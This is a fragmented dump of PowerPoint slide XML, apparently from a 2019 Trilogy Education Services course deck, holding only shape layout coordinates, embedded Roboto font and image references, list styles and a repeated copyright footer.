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21214075" cx="36576000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin"/>
      <p:regular r:id="rId34"/>
      <p:bold r:id="rId35"/>
      <p:italic r:id="rId36"/>
      <p:boldItalic r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId38"/>
      <p:boldItalic r:id="rId39"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium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Roboto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920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0B552A-431E-49BD-A181-305D21F2BD94}">
  <a:tblStyle styleId="{2C0B552A-431E-49BD-A181-305D21F2BD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920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regular.fntdata"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-italic.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium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obotoMedium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oboto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Thin-bold.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-regular.fntdata"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-italic.fntdata"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-boldItalic.fntdata"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack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0ee1c2076d_0_56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0ee1c2076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0f77f7f7fe_0_0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10f77f7f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0ee352c0c3_0_4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0ee352c0c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0ee1c2076d_0_94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0ee1c2076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0ee1c2076d_0_153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0ee1c2076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0f77f7f7fe_0_49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0f77f7f7f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798eb4c44_0_83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623a2bef4_1_135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623a2bef4_1_148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8623a2bef4_1_159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623a2bef4_1_0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8623a2bef4_1_170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8798eb4c44_0_154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798eb4c44_0_159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8798eb4c44_0_169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8798eb4c44_0_182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8798eb4c44_0_193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8798eb4c44_0_205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8798eb4c44_0_216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0f7e6291e_1_107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798eb4c44_0_15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798eb4c44_0_25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98eb4c44_0_30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8798eb4c44_0_44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0ee1c2076d_0_3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0ee1c207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0910b9232a_0_179:notes"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473265" y="685800"/>
            <a:ext cx="5912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0910b9232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1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5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52.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58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71.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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70.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69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75.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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9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Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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81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6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8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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1097280" y="1133732"/>
            <a:ext cx="34381440" cy="189466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1095600" y="15702169"/>
            <a:ext cx="34384800" cy="4380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825200" y="20080884"/>
            <a:ext cx="34653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9500" lIns="369500" spcFirstLastPara="1" rIns="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© 2019 Trilogy Education Services, Inc. </a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;11;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099200" y="16425596"/>
            <a:ext cx="343812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4804100" wrap="square" tIns="36950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73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8988" y="16425596"/>
            <a:ext cx="3288909" cy="2842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2102400" y="17816668"/>
            <a:ext cx="333780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4804100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1097400" y="7542782"/>
            <a:ext cx="343812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7775" lIns="11640875" spcFirstLastPara="1" rIns="184777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3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2102400" y="14217060"/>
            <a:ext cx="333780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934350" spcFirstLastPara="1" rIns="1108575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700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442" y="5078066"/>
            <a:ext cx="9135882" cy="6806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1097280" y="1133732"/>
            <a:ext cx="34350899" cy="1835864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29400" y="0"/>
            <a:ext cx="36631200" cy="11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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Google Shape;85;p11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1095600" y="15702169"/>
            <a:ext cx="34384800" cy="438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970200" y="16066126"/>
            <a:ext cx="356316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0" spcFirstLastPara="1" rIns="3695525" wrap="square" tIns="36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109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850" y="-942848"/>
            <a:ext cx="34110783" cy="1624326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404400" y="18093934"/>
            <a:ext cx="370056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3695525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7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1097280" y="1133732"/>
            <a:ext cx="34350899" cy="1835864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1095600" y="15702169"/>
            <a:ext cx="34384800" cy="438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8639" y="16395281"/>
            <a:ext cx="2192615" cy="290099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404400" y="17465368"/>
            <a:ext cx="35881200" cy="26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4065025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7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29400" y="0"/>
            <a:ext cx="36631200" cy="11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3596000" y="4674492"/>
            <a:ext cx="6943270" cy="763759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1097300" y="16263609"/>
            <a:ext cx="306336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369500" wrap="square" tIns="36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5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1095600" y="4301279"/>
            <a:ext cx="34381200" cy="11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7775" lIns="10347400" spcFirstLastPara="1" rIns="184777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33102500" y="17136238"/>
            <a:ext cx="2375328" cy="26128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700" y="5296817"/>
            <a:ext cx="36576000" cy="13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525" lIns="1847775" spcFirstLastPara="1" rIns="1847775" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-590550" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="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indent="-590550" lvl="1" marL="9144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2pPr>
            <a:lvl3pPr indent="-590550" lvl="2" marL="13716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3pPr>
            <a:lvl4pPr indent="-590550" lvl="3" marL="18288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4pPr>
            <a:lvl5pPr indent="-590550" lvl="4" marL="22860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5pPr>
            <a:lvl6pPr indent="-590550" lvl="5" marL="27432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6pPr>
            <a:lvl7pPr indent="-590550" lvl="6" marL="32004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7pPr>
            <a:lvl8pPr indent="-590550" lvl="7" marL="36576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8pPr>
            <a:lvl9pPr indent="-590550" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="320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49200" y="19144223"/>
            <a:ext cx="366744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434625" spcFirstLastPara="1" rIns="4065025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1097280" y="1133732"/>
            <a:ext cx="34350899" cy="18358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1095600" y="15702169"/>
            <a:ext cx="34384800" cy="438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8639" y="16395281"/>
            <a:ext cx="2192615" cy="290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1095600" y="4301279"/>
            <a:ext cx="34381200" cy="11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7775" lIns="10347400" spcFirstLastPara="1" rIns="184777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404400" y="17465368"/>
            <a:ext cx="35881200" cy="26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4065025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7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1097300" y="16263609"/>
            <a:ext cx="306336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369500" wrap="square" tIns="36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5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600" y="-2454147"/>
            <a:ext cx="11790923" cy="2055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49200" y="19144223"/>
            <a:ext cx="366744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434625" spcFirstLastPara="1" rIns="4065025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700" y="5296817"/>
            <a:ext cx="36576000" cy="13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525" lIns="1847775" spcFirstLastPara="1" rIns="1847775" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-590550" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="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indent="-590550" lvl="1" marL="9144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2pPr>
            <a:lvl3pPr indent="-590550" lvl="2" marL="13716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3pPr>
            <a:lvl4pPr indent="-590550" lvl="3" marL="18288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4pPr>
            <a:lvl5pPr indent="-590550" lvl="4" marL="22860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5pPr>
            <a:lvl6pPr indent="-590550" lvl="5" marL="27432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6pPr>
            <a:lvl7pPr indent="-590550" lvl="6" marL="32004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7pPr>
            <a:lvl8pPr indent="-590550" lvl="7" marL="36576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8pPr>
            <a:lvl9pPr indent="-590550" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="320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852802" y="15932107"/>
            <a:ext cx="2624760" cy="457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1097280" y="1133732"/>
            <a:ext cx="34350899" cy="1835864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29400" y="0"/>
            <a:ext cx="36631200" cy="11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3433476" y="4527092"/>
            <a:ext cx="6943276" cy="791532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1095600" y="15702169"/>
            <a:ext cx="34384800" cy="438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639" y="16395281"/>
            <a:ext cx="2192615" cy="290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404400" y="17465368"/>
            <a:ext cx="35881200" cy="26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4065025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7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1097300" y="16263609"/>
            <a:ext cx="306336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369500" wrap="square" tIns="36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5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1095600" y="4301279"/>
            <a:ext cx="34381200" cy="11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7775" lIns="10347400" spcFirstLastPara="1" rIns="184777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700" y="5296817"/>
            <a:ext cx="36576000" cy="13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525" lIns="1847775" spcFirstLastPara="1" rIns="1847775" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-590550" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="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indent="-590550" lvl="1" marL="9144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2pPr>
            <a:lvl3pPr indent="-590550" lvl="2" marL="13716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3pPr>
            <a:lvl4pPr indent="-590550" lvl="3" marL="18288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4pPr>
            <a:lvl5pPr indent="-590550" lvl="4" marL="22860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5pPr>
            <a:lvl6pPr indent="-590550" lvl="5" marL="27432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6pPr>
            <a:lvl7pPr indent="-590550" lvl="6" marL="32004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7pPr>
            <a:lvl8pPr indent="-590550" lvl="7" marL="36576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8pPr>
            <a:lvl9pPr indent="-590550" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="320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33028276" y="17326271"/>
            <a:ext cx="2192616" cy="249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49200" y="19144223"/>
            <a:ext cx="366744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434625" spcFirstLastPara="1" rIns="4065025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019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5410200" y="5686886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1828799" y="5686774"/>
            <a:ext cx="3107557" cy="256249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121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1828799" y="9192190"/>
            <a:ext cx="3107557" cy="256249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121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1828799" y="12677861"/>
            <a:ext cx="3107557" cy="256249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1828799" y="16183225"/>
            <a:ext cx="3107557" cy="256249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49200" y="5765972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5410200" y="9202194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5410200" y="1267792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5410200" y="1616359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49200" y="9212099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1268787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49200" y="16163539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5449824" y="5362756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1828800" y="5362645"/>
            <a:ext cx="3107557" cy="256249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121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1828799" y="8249343"/>
            <a:ext cx="3107557" cy="256249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121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1828799" y="11106448"/>
            <a:ext cx="3107557" cy="256249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1828799" y="13983247"/>
            <a:ext cx="3107557" cy="256249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300" y="5441894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5410200" y="8259347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5410200" y="11106508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5410200" y="13963613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48700" y="8269303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11116458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49200" y="1396356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1877999" y="16840352"/>
            <a:ext cx="3107557" cy="256249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5459400" y="16820718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16820718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5410200" y="5105339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1828800" y="5105275"/>
            <a:ext cx="3107600" cy="2005696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48600" y="5257222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5410200" y="7543195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1828800" y="7543130"/>
            <a:ext cx="3107600" cy="2005696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5410200" y="9981050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1828800" y="9980986"/>
            <a:ext cx="3107600" cy="2005696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5410200" y="12418906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1828800" y="12418841"/>
            <a:ext cx="3107600" cy="2005696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5410200" y="14856812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1828800" y="14856748"/>
            <a:ext cx="3107600" cy="2005696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5410200" y="17294874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1828800" y="17294810"/>
            <a:ext cx="3107600" cy="2005696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48300" y="7625477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48300" y="10063333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48600" y="12501291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49900" y="14939095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49900" y="17471658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1097280" y="1133732"/>
            <a:ext cx="34381440" cy="189466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1095600" y="15702169"/>
            <a:ext cx="34384800" cy="4380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1099200" y="16425596"/>
            <a:ext cx="343812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4804100" wrap="square" tIns="36950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73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8988" y="16425596"/>
            <a:ext cx="3288909" cy="2842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2102400" y="17816668"/>
            <a:ext cx="333780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4804100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1097400" y="7542782"/>
            <a:ext cx="343812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7775" lIns="11640875" spcFirstLastPara="1" rIns="184777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3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2102400" y="14217060"/>
            <a:ext cx="333780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934350" spcFirstLastPara="1" rIns="1108575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700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942" y="4365930"/>
            <a:ext cx="10232190" cy="767414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825200" y="20080884"/>
            <a:ext cx="34653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9500" lIns="369500" spcFirstLastPara="1" rIns="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© 2019 Trilogy Education Services, Inc. </a:t>
            </a:r>
            <a:endParaRPr sz="24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5410200" y="5105339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1828800" y="5105275"/>
            <a:ext cx="3107600" cy="2005696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48900" y="5257222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5410200" y="7543195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1828800" y="7543130"/>
            <a:ext cx="3107600" cy="2005696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5410200" y="9981050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1828800" y="9980986"/>
            <a:ext cx="3107600" cy="2005696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5410200" y="12418906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1828800" y="12418841"/>
            <a:ext cx="3107600" cy="2005696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5410200" y="14856812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1828800" y="14856748"/>
            <a:ext cx="3107600" cy="2005696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5410200" y="17294874"/>
            <a:ext cx="300684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1828800" y="17294810"/>
            <a:ext cx="3107600" cy="2005696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49200" y="7666567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49000" y="10063333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48600" y="12501291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48500" y="14939147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48600" y="17471658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5018000" y="4791057"/>
            <a:ext cx="305604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1828888" y="4742238"/>
            <a:ext cx="2852777" cy="1841229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10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4847562"/>
            <a:ext cx="354792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9128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5018000" y="6946594"/>
            <a:ext cx="305604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1828888" y="6897776"/>
            <a:ext cx="2852777" cy="1841229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10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500" y="7003099"/>
            <a:ext cx="354792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9128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5017900" y="9104297"/>
            <a:ext cx="305604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1828788" y="9055478"/>
            <a:ext cx="2852777" cy="1841229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10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9160801"/>
            <a:ext cx="354792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9128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5017900" y="11259834"/>
            <a:ext cx="305604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1828788" y="11211016"/>
            <a:ext cx="2852777" cy="1841229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10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500" y="11316339"/>
            <a:ext cx="354792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9128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5018000" y="13415371"/>
            <a:ext cx="305604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1828888" y="13366553"/>
            <a:ext cx="2852777" cy="1841229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10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100" y="13471876"/>
            <a:ext cx="354792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9128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5018000" y="15570908"/>
            <a:ext cx="305604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1828888" y="15522090"/>
            <a:ext cx="2852777" cy="1841229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10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200" y="15627413"/>
            <a:ext cx="354792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9128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5018000" y="17831722"/>
            <a:ext cx="305604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1828888" y="17782904"/>
            <a:ext cx="2852777" cy="1841229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10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100" y="17888227"/>
            <a:ext cx="354792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9128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4716450" y="15974007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1829708" y="15974101"/>
            <a:ext cx="2410255" cy="1555625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48400" y="15974485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4716000" y="17780940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1829258" y="17781034"/>
            <a:ext cx="2410255" cy="1555625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48300" y="17781507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4716250" y="12359448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1829508" y="12359542"/>
            <a:ext cx="2410255" cy="1555625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48598" y="12359926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4715800" y="14166381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1829058" y="14166475"/>
            <a:ext cx="2410255" cy="1555625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48600" y="14166948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4716350" y="8806755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1829608" y="8806850"/>
            <a:ext cx="2410255" cy="1555625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48499" y="8807233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4715900" y="10613688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1829158" y="10613783"/>
            <a:ext cx="2410255" cy="1555625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49000" y="10614255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4716150" y="5192196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1829408" y="5192291"/>
            <a:ext cx="2410255" cy="1555625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49199" y="5192674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4715700" y="6999129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1828958" y="6999224"/>
            <a:ext cx="2410255" cy="1555625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49200" y="6999696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4716450" y="15974007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1829708" y="15974101"/>
            <a:ext cx="2410255" cy="1555625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48398" y="15974485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4716000" y="17780940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1829258" y="17781034"/>
            <a:ext cx="2410255" cy="1555625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48300" y="17781507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4716250" y="12359448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1829508" y="12359542"/>
            <a:ext cx="2410255" cy="1555625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48598" y="12359926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4715800" y="14166381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1829058" y="14166475"/>
            <a:ext cx="2410255" cy="1555625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48600" y="14166948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4716350" y="8806755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1829608" y="8806850"/>
            <a:ext cx="2410255" cy="1555625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701" y="8807233"/>
            <a:ext cx="354792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4715900" y="10613688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1829158" y="10613783"/>
            <a:ext cx="2410255" cy="1555625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49200" y="10614255"/>
            <a:ext cx="355284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4716150" y="5192196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1829408" y="5192291"/>
            <a:ext cx="2410255" cy="1555625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1" y="5192674"/>
            <a:ext cx="354792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4715700" y="6999129"/>
            <a:ext cx="307644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1828958" y="6999224"/>
            <a:ext cx="2410255" cy="1555625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8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6999696"/>
            <a:ext cx="354792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5433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1828726" y="5547855"/>
            <a:ext cx="2133487" cy="2200334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85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2897100" y="7992243"/>
            <a:ext cx="9714000" cy="1098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2897100" y="7992498"/>
            <a:ext cx="9486000" cy="10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9075" lIns="739075" spcFirstLastPara="1" rIns="739075" wrap="square" tIns="7390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13220626" y="5547855"/>
            <a:ext cx="2133487" cy="2200334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85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14289000" y="7992243"/>
            <a:ext cx="9714000" cy="1098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14289000" y="7992498"/>
            <a:ext cx="9486000" cy="10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9075" lIns="739075" spcFirstLastPara="1" rIns="739075" wrap="square" tIns="7390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24536326" y="5550948"/>
            <a:ext cx="2133487" cy="2200334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85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25604700" y="7995337"/>
            <a:ext cx="9714000" cy="1098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25604700" y="7995592"/>
            <a:ext cx="9486000" cy="10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9075" lIns="739075" spcFirstLastPara="1" rIns="739075" wrap="square" tIns="7390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5100" y="2679445"/>
            <a:ext cx="3309799" cy="1697306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49200" y="6609214"/>
            <a:ext cx="17193600" cy="13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19745097" y="3671373"/>
            <a:ext cx="10753200" cy="19662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8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20289878" y="5274908"/>
            <a:ext cx="1044117" cy="596783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1828983" y="3662196"/>
            <a:ext cx="10753200" cy="19662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8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2301454" y="5265680"/>
            <a:ext cx="905945" cy="596783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17867200" y="6618494"/>
            <a:ext cx="17193600" cy="13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1600200" y="5166793"/>
            <a:ext cx="3162000" cy="263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4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9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4762200" y="5265161"/>
            <a:ext cx="29908800" cy="2436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4533900" y="5265161"/>
            <a:ext cx="28461600" cy="2436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1828750" y="8093705"/>
            <a:ext cx="29908800" cy="2436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3504250" y="8093705"/>
            <a:ext cx="28461600" cy="2436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31737600" y="7995337"/>
            <a:ext cx="3162000" cy="263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4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9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1828800" y="10815837"/>
            <a:ext cx="3162000" cy="263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4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9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4763724" y="10914205"/>
            <a:ext cx="29908800" cy="2436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4535424" y="10914205"/>
            <a:ext cx="28461600" cy="2436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2057350" y="14057031"/>
            <a:ext cx="29908800" cy="2436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3732850" y="14057031"/>
            <a:ext cx="28461600" cy="2436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31966200" y="13958663"/>
            <a:ext cx="3162000" cy="263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4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9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1752600" y="16891194"/>
            <a:ext cx="3162000" cy="263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4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9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763724" y="16989562"/>
            <a:ext cx="29908800" cy="2436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4535424" y="16989562"/>
            <a:ext cx="28461600" cy="2436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48700" y="5227938"/>
            <a:ext cx="29738400" cy="24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700" y="8021888"/>
            <a:ext cx="36576000" cy="24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47775" spcFirstLastPara="1" rIns="62823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48700" y="10922248"/>
            <a:ext cx="36674400" cy="24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48700" y="14001042"/>
            <a:ext cx="36576000" cy="24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47775" spcFirstLastPara="1" rIns="62823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700" y="16989511"/>
            <a:ext cx="36674400" cy="24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  <p15:guide id="2" pos="2184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5410200" y="5686886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48900" y="5765972"/>
            <a:ext cx="365760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5410200" y="9202194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5410200" y="1267792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5410200" y="1616359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48900" y="921215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12687922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49200" y="1616359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5785813"/>
            <a:ext cx="3142266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719072" y="9185540"/>
            <a:ext cx="3139475" cy="24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729224" y="16153684"/>
            <a:ext cx="3139475" cy="24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2712609"/>
            <a:ext cx="3142266" cy="25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  <p15:guide id="2" pos="6048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5410200" y="5686886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48900" y="5765972"/>
            <a:ext cx="365760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5410200" y="9202194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5410200" y="1267792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5410200" y="1616359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48900" y="921215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12687922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49200" y="1616359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5785813"/>
            <a:ext cx="3142266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719072" y="9185540"/>
            <a:ext cx="3142266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729224" y="16153684"/>
            <a:ext cx="3142266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2712609"/>
            <a:ext cx="3142266" cy="25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5410200" y="5686886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48900" y="5765972"/>
            <a:ext cx="365760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5410200" y="9202194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5410200" y="1267792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5410200" y="1616359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48900" y="921215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12687922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49200" y="1616359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719072" y="5785813"/>
            <a:ext cx="3142267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719072" y="9185540"/>
            <a:ext cx="3142265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719072" y="12605116"/>
            <a:ext cx="3142265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729224" y="16153684"/>
            <a:ext cx="3142267" cy="25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1097280" y="1133732"/>
            <a:ext cx="34381440" cy="189466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1095600" y="15702169"/>
            <a:ext cx="34384800" cy="4380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1099200" y="16425596"/>
            <a:ext cx="343812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4804100" wrap="square" tIns="36950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73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8988" y="16425596"/>
            <a:ext cx="3288909" cy="2842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2102400" y="17816668"/>
            <a:ext cx="333780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4804100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1097400" y="7542782"/>
            <a:ext cx="343812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7775" lIns="11640875" spcFirstLastPara="1" rIns="184777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3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2102400" y="14217060"/>
            <a:ext cx="333780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934350" spcFirstLastPara="1" rIns="1108575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700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042" y="4751953"/>
            <a:ext cx="9135882" cy="676055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825200" y="20080884"/>
            <a:ext cx="34653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9500" lIns="369500" spcFirstLastPara="1" rIns="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© 2019 Trilogy Education Services, Inc. </a:t>
            </a:r>
            <a:endParaRPr sz="24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5410200" y="5686886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48900" y="5765972"/>
            <a:ext cx="365760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5410200" y="9202194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5410200" y="1267792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5410200" y="1616359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48900" y="921215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12687922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49200" y="1616359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719072" y="5785813"/>
            <a:ext cx="3139477" cy="24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719072" y="9185540"/>
            <a:ext cx="3139475" cy="24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719072" y="12605116"/>
            <a:ext cx="3139475" cy="24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729224" y="16153684"/>
            <a:ext cx="3139477" cy="242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5449824" y="5362756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100" y="5441894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5410200" y="8259347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5410200" y="11106508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5410200" y="13963613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48700" y="8269303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400" y="11116509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49200" y="13963613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5459400" y="16820718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16820718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5419665"/>
            <a:ext cx="3142266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719072" y="8291567"/>
            <a:ext cx="3139475" cy="24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719072" y="11141145"/>
            <a:ext cx="3142264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719072" y="13993300"/>
            <a:ext cx="3139475" cy="24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719072" y="16820710"/>
            <a:ext cx="3142264" cy="25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5449824" y="5362756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100" y="5441894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5410200" y="8259347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5410200" y="11106508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5410200" y="13963613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48700" y="8269303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400" y="11116509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49200" y="13963613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5459400" y="16820718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16820718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5419665"/>
            <a:ext cx="3142266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719072" y="8291567"/>
            <a:ext cx="3142266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719072" y="11141145"/>
            <a:ext cx="3142264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719072" y="13993300"/>
            <a:ext cx="3142266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719072" y="16820710"/>
            <a:ext cx="3142264" cy="25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5449824" y="5362756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100" y="5441894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5410200" y="8259347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5410200" y="11106508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5410200" y="13963613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48700" y="8269303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400" y="11116509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49200" y="13963613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5459400" y="16820718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16820718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719072" y="5419665"/>
            <a:ext cx="3142267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719072" y="8291567"/>
            <a:ext cx="3142265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719072" y="11141145"/>
            <a:ext cx="3142265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719072" y="13993300"/>
            <a:ext cx="3142265" cy="2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719072" y="16820710"/>
            <a:ext cx="3142265" cy="25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  <p15:guide id="2" pos="604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5449824" y="5362756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100" y="5441894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5410200" y="8259347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5410200" y="11106508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5410200" y="13963613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48700" y="8269303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400" y="11116509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49200" y="13963613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5459400" y="16820718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16820718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719072" y="5419665"/>
            <a:ext cx="3139477" cy="24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719072" y="8291567"/>
            <a:ext cx="3139475" cy="24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719072" y="11141145"/>
            <a:ext cx="3139475" cy="24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719072" y="13993300"/>
            <a:ext cx="3139475" cy="24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719072" y="16820710"/>
            <a:ext cx="3139475" cy="242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4565100" y="5105339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48600" y="5257222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4565400" y="7543195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4565400" y="9981050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4565400" y="12418906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4565100" y="14856864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4565400" y="17294926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48400" y="7625477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48800" y="10063333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49000" y="12501291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48500" y="14939147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48500" y="17471658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5204520"/>
            <a:ext cx="2311218" cy="18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719072" y="7625465"/>
            <a:ext cx="2309164" cy="178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0063320"/>
            <a:ext cx="2311218" cy="18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719072" y="12542369"/>
            <a:ext cx="2309164" cy="178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4939237"/>
            <a:ext cx="2311218" cy="18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719072" y="17336158"/>
            <a:ext cx="2309164" cy="1784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4565100" y="5105339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48600" y="5257222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4565400" y="7543195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4565400" y="9981050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4565400" y="12418906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4565100" y="14856864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4565400" y="17294926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48400" y="7625477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48800" y="10063333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49000" y="12501291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48500" y="14939147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48500" y="17471658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5204520"/>
            <a:ext cx="2311218" cy="18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7625465"/>
            <a:ext cx="2311218" cy="18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0063320"/>
            <a:ext cx="2311218" cy="18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2542369"/>
            <a:ext cx="2311218" cy="18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4939237"/>
            <a:ext cx="2311218" cy="18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7336158"/>
            <a:ext cx="2311218" cy="184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4565100" y="5105339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48600" y="5257222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4565400" y="7543195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4565400" y="9981050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4565400" y="12418906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4565100" y="14856864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4565400" y="17294926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48400" y="7625477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48800" y="10063333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49000" y="12501291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48500" y="14939147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48500" y="17471658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719072" y="5204520"/>
            <a:ext cx="2311218" cy="184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719072" y="7625465"/>
            <a:ext cx="2311218" cy="184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719072" y="10063320"/>
            <a:ext cx="2311218" cy="184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719072" y="12542369"/>
            <a:ext cx="2311218" cy="184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719072" y="14939237"/>
            <a:ext cx="2311218" cy="184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719072" y="17336158"/>
            <a:ext cx="2311218" cy="184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4565100" y="5105339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48600" y="5257222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4565400" y="7543195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4565400" y="9981050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4565400" y="12418906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4565100" y="14856864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4565400" y="17294926"/>
            <a:ext cx="30913200" cy="200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48400" y="7625477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48800" y="10063333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49000" y="12501291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48500" y="14939147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48500" y="17471658"/>
            <a:ext cx="366744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7280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719072" y="5204520"/>
            <a:ext cx="2309166" cy="178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719072" y="7625465"/>
            <a:ext cx="2309166" cy="178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719072" y="10063320"/>
            <a:ext cx="2309166" cy="178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719072" y="12542369"/>
            <a:ext cx="2309166" cy="178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719072" y="14939237"/>
            <a:ext cx="2309166" cy="178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719072" y="17336158"/>
            <a:ext cx="2309166" cy="1784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4180100" y="4791057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4847562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4180800" y="6946594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1000" y="7003099"/>
            <a:ext cx="365760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4180300" y="9104297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9160801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4180300" y="11259834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1000" y="11316339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4180400" y="13415371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13471876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4180400" y="15570908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200" y="15627413"/>
            <a:ext cx="365760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4180400" y="17831722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100" y="17888227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4832147"/>
            <a:ext cx="2084831" cy="16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719072" y="7051355"/>
            <a:ext cx="2084832" cy="163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9096873"/>
            <a:ext cx="2084831" cy="16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719072" y="11363512"/>
            <a:ext cx="2084832" cy="163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3519049"/>
            <a:ext cx="2084831" cy="16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719072" y="15651273"/>
            <a:ext cx="2083918" cy="162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7914108"/>
            <a:ext cx="2083918" cy="162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1097280" y="1133732"/>
            <a:ext cx="34381440" cy="189466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1095600" y="15702169"/>
            <a:ext cx="34384800" cy="438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8988" y="16425596"/>
            <a:ext cx="3288909" cy="2842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042" y="4921286"/>
            <a:ext cx="9135882" cy="676055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1099200" y="16425596"/>
            <a:ext cx="343812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4804100" wrap="square" tIns="36950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73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2102400" y="17816668"/>
            <a:ext cx="333780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4804100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1097400" y="7542782"/>
            <a:ext cx="343812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7775" lIns="11640875" spcFirstLastPara="1" rIns="184777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3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2102400" y="14217060"/>
            <a:ext cx="333780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934350" spcFirstLastPara="1" rIns="1108575" wrap="square" tIns="368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700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825200" y="20080884"/>
            <a:ext cx="34653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9500" lIns="369500" spcFirstLastPara="1" rIns="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© 2019 Trilogy Education Services, Inc. </a:t>
            </a:r>
            <a:endParaRPr sz="24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4180100" y="4791057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4847562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4180800" y="6946594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1000" y="7003099"/>
            <a:ext cx="365760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4180300" y="9104297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9160801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4180300" y="11259834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1000" y="11316339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4180400" y="13415371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13471876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4180400" y="15570908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200" y="15627413"/>
            <a:ext cx="365760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4180400" y="17831722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100" y="17888227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4832147"/>
            <a:ext cx="2084831" cy="16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7051355"/>
            <a:ext cx="2084831" cy="16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9096873"/>
            <a:ext cx="2084831" cy="16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1363512"/>
            <a:ext cx="2084831" cy="16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3519049"/>
            <a:ext cx="2084831" cy="16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5651273"/>
            <a:ext cx="2083918" cy="162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7914108"/>
            <a:ext cx="2083918" cy="162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4180100" y="4791057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4847562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4180800" y="6946594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1000" y="7003099"/>
            <a:ext cx="365760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4180300" y="9104297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9160801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4180300" y="11259834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1000" y="11316339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4180400" y="13415371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13471876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4180400" y="15570908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200" y="15627413"/>
            <a:ext cx="365760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4180400" y="17831722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100" y="17888227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719072" y="4832147"/>
            <a:ext cx="2084832" cy="163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719072" y="7051355"/>
            <a:ext cx="2084832" cy="163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719072" y="9096873"/>
            <a:ext cx="2084832" cy="163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719072" y="11363512"/>
            <a:ext cx="2084832" cy="163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719072" y="13519049"/>
            <a:ext cx="2084832" cy="163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719072" y="15651273"/>
            <a:ext cx="2083918" cy="162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719072" y="17914108"/>
            <a:ext cx="2083918" cy="162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4180100" y="4791057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4847562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4180800" y="6946594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1000" y="7003099"/>
            <a:ext cx="365760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4180300" y="9104297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9160801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4180300" y="11259834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1000" y="11316339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4180400" y="13415371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13471876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4180400" y="15570908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200" y="15627413"/>
            <a:ext cx="365760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4180400" y="17831722"/>
            <a:ext cx="31398000" cy="1841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100" y="17888227"/>
            <a:ext cx="365760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358500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719072" y="4832147"/>
            <a:ext cx="2084831" cy="163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719072" y="7051355"/>
            <a:ext cx="2084831" cy="163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719072" y="9096873"/>
            <a:ext cx="2084831" cy="163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719072" y="11363512"/>
            <a:ext cx="2084831" cy="163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719072" y="13519049"/>
            <a:ext cx="2084831" cy="163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719072" y="15651273"/>
            <a:ext cx="2083918" cy="162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719072" y="17914108"/>
            <a:ext cx="2083918" cy="162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4015701" y="1597397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98400" y="15974279"/>
